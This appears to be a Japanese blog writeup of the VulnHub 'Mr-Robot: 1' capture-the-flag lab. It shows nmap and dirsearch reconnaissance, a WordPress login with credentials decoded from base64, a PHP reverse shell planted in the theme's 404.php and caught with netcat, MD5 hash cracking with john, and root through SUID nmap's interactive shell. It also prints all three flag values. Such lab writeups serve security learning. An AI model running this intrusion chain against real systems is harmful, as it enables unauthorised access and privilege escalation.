0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【VulnHub】Mr-Robot 1:Writeup

Posted at

概要

VulnHub「Mr-Robot: 1」のWriteupです。

User Flag

ターゲットマシンのIPアドレスを特定します。

$nmap -PE -PP -PM -sP -n 192.168.178.0/24
Warning:  You are not root -- using TCP pingscan rather than ICMP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-24 06:56 UTC
Nmap scan report for 192.168.178.20
Host is up (0.00015s latency).
Nmap scan report for 192.168.178.30
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 1.43 seconds

192.168.178.20は、攻撃用Parrot OSマシンのIPアドレスです。
192.168.178.30が、ターゲットマシンのIPアドレスだと分かりました。

ポートスキャンを実行します。

$nmap -Pn -sCV -T4 -p- 192.168.178.30 -oN nmap_result
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache

ポートの稼働状況が分かりました。

ポート サービス バージョン
80 http Apache
443 http Apache

80番ポートにアクセスすると、ターミナル風の画面が表示されました。

image.png

ディレクトリスキャンを実行すると、/robots.txt/wp-loginなどのパスを発見しました。
WordPressがインストールされている可能性が高いです。

$dirsearch -u http://192.168.178.30

[07:08:02] 200 -  614B  - /admin/
[07:08:04] 200 -  677B  - /admin/index
[07:08:04] 200 -  677B  - /admin/index.html
[07:09:28] 200 -  504KB - /intro
[07:09:33] 200 -  158B  - /license
[07:09:33] 200 -  158B  - /license.txt
[07:10:12] 200 -   64B  - /readme
[07:10:12] 200 -   64B  - /readme.html
[07:10:16] 200 -   41B  - /robots.txt
[07:10:55] 200 -    1KB - /wp-login
[07:10:55] 200 -    1KB - /wp-login/
[07:10:55] 200 -    1KB - /wp-login.php

/robots.txtにアクセスすると、2つのパスを新たに発見しました。

$curl http://192.168.178.30/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

key-1-of-3.txtでは、キーの一部を入手できました。

$curl http://192.168.178.30/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

/fsocity.dicをダウンロードし、中身を見るとパスワード辞書ファイルの様です。

$wget http://192.168.178.30/fsocity.dic
--2025-08-24 07:18:42--  http://192.168.178.30/fsocity.dic
Connecting to 192.168.178.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’

fsocity.dic                100%[=======================================>]   6.91M  --.-KB/s    in 0.1s    

2025-08-24 07:18:42 (61.4 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]

$head fsocity.dic 
true
false
wikia
from
the
now
Wikia
extensions
scss
window

/wp-adminにアクセスすると、WordPressのログイン画面が表示されたのでブルートフォースで認証を突破できるかもしれません。

image.png

探索を続け、/license.txtにアクセスすると、Base64でデコードされた文字列を発見しました。

$curl http://192.168.178.30/license.txt

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

do you want a password or something?

ZWxsaW90OkVSMjgtMDY1Mgo=

デコードすると、認証情報を入手できました。

$echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652

どちらも入手した辞書ファイルに登録された文字列なので、正しい認証情報の可能性が高いです。

$cat fsocity.dic | grep elliot
elliot

$cat fsocity.dic | grep ER28-0652
ER28-0652

Username: elliotPassword: ER28-0652でWordPressの管理画面にログイン出来ました。

image.png

Appearance->Editor->404.phpにアクセスし、404のページをPHPのリバースシェルコードに書き換えます。

image.png

Netcatでリッスンし、/404.phpにアクセスするとシェルを取得できました。

$nc -lnvp 1234
Listening on 0.0.0.0 1234
Connection received on 192.168.178.30 33872
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 16:38:15 up 45 min,  0 users,  load average: 0.00, 0.02, 0.21
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon

TTYの設定をします。

$ python -c "import pty;pty.spawn('/bin/bash')"

/home/robot配下を確認すると、2つのファイルを発見しました。
password.raw-md5は読み取り権限があります。

$ ls -la
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

password.raw-md5には、robotアカウントのパスワードハッシュ値らしき文字列が記載されています。

$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

ハッシュ値の解析に成功し、パスフレーズを特定できました。

$john --wordlist=/usr/share/wordlists/rockyou.txt robot_hash --format=Raw-MD5

abcdefghijklmnopqrstuvwxyz (robot)

robotアカウントに昇格出来ました。

$ su robot 
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ whoami  
whoami
robot

key-2-of-3.txtから2つ目のキーを入手できました。

$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Root Flag

SUIDが設定されたプログラムを検索すると、nmapがヒットしました。

$ find / -perm -u=s -type f 2>/dev/null

/usr/local/bin/nmap

GTFOBinsで権限昇格のテクニックが見つかりました。

nmap経由でシェルを起動すると、rootに昇格出来ました。

$ /usr/local/bin/nmap --interactive

nmap> !sh
!sh
# whoami
whoami
root

/root/key-3-of-3.txtから最後のキーを入手できました。

# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?